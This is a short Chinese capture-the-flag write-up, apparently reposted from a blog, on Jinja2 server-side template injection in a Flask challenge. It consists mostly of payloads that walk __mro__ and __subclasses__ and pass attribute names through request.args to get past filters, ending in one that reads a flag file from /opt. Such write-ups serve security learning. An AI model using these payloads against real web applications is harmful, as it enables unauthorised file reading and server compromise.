本文共 638 字,大约阅读时间需要 2 分钟。
{ {''.__class__.__mro__}}
url_for
函数 尝试一下{ {url_for.__globals__}}
{ {get_flashed_messages.__globals__}}
结局一样 得得得!!! 又是没涉及到的新知识{ {''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__
{ {''[request.args.a][request.args.b][2][request.args.c]()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt")[request.args.d]}}?a=__class__&b=__mro__&c=__subclasses__&d=read()
转载地址:http://xywmf.baihongyu.com/